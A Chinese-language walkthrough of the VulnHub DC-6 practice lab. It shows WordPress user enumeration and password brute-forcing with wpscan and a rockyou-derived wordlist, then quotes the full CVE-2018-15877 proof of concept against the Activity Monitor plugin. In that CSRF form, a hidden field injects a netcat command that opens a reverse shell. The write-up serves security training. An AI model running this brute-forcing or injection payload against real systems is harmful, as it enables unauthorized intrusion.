vulnhub渗透实战-DC6

先nmap一下：

可以看到在22端口开放了ssh服务，在80端口开放了http服务。由于还没有任何用户的信息，所以只能从80端口入手。

针对80端口的http服务，dirb一下，发现扫描到了一个admin登录用户，点开看看：

是wordpress的admin登录页面。针对wordpress，有专门针对wordpress的wpscan工具。目前还是没有用户名和密码，那么首先可以使用wpscan枚举用户名：

wpscan --url http://wordy -e u

将枚举出的可能的用户名保存在username.txt中：

先在用户名有了，密码字典在靶机的提示中有写：

cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt

grep分析一行信息，若当中有我们所需要的信息就将该行取出来。也就是上述命令将rockyou.txt中有k01的行都取了出来放在passwords.txt中。

这时候我们用户名和密码的字典都有了，直接用wpscan进行爆破即可，并成功破解出一对用户名和密码：

使用mark-helpdesk01进行后台登陆（无法登录ssh）：
登陆后台以后东西太多了。wordpress的漏洞很多情况下是出现在插件中的，那么我们注意到这个activity monitor：

的确，我们通过wpsacn也可以枚举到这个插件：wpscan --url http://wordy --plugins-detection aggressive

确定了插件存在以后searchsploit一下看看activity monitor有没有漏洞：

确定了存在一个命令执行的漏洞，打开上述漏洞对应的描述文件（只贴出POC部分）：

PoC:
-->

<html>
  <!--  Wordpress Plainview Activity Monitor RCE
        [+] Version: 20161228 and possibly prior
        [+] Description: Combine OS Commanding and CSRF to get reverse shell
        [+] Author: LydA(c)ric LEFEBVRE
        [+] CVE-ID: CVE-2018-15877
        [+] Usage: Replace 127.0.0.1 & 9999 with you ip and port to get reverse shell
        [+] Note: Many reflected XSS exists on this plugin and can be combine with this exploit as well
  -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://localhost:8000/wp-admin/admin.php?page=plainview_activity_monitor&tab=activity_tools" method="POST" enctype="multipart/form-data">
      <input type="hidden" name="ip" value="google.fr| nc -nlvp 127.0.0.1 9999 -e /bin/bash" />
      <input type="hidden" name="lookup" value="Lookup" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>